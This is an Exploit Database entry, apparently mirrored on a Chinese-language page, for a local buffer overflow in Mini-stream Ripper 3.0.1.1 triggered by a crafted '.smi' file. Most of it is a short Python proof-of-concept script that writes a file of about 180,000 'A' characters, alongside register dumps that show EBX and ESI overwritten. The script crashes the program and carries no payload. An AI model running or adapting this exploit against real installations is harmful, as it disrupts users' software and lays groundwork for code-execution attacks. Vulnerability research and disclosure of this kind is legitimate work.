Mini-stream Ripper 3.0.1.1 – ‘.smi’ Local Buffer Overflow (PoC)

• Exploit Database
• 118 阅读

• 作者： d3b4g
  日期： 2010-01-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11197/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  #!/usr/bin/python # Tested on: win XPsp3 # webpage: d3b4g.info   #EAX 00E1C880 #EDX 00000001 #EBX 41414141------------------------------------------------ #ESP 000D198C #EBP 00E1C880controle over registers #ESI 41414141------------------------------------------------ #EDI 00E1C880 #EIP 00431302 Ripper.00431302 #C 0ES 0023 32bit 0(FFFFFFFF) #P 0CS 001B 32bit 0(FFFFFFFF) #A 0SS 0023 32bit 0(FFFFFFFF) #Z 0DS 0023 32bit 0(FFFFFFFF)   chars = "A"*90000 crush = "\x41\x41\x41\x41" file=open('exp.smi','w') file.write(chars+crush+chars) file.close()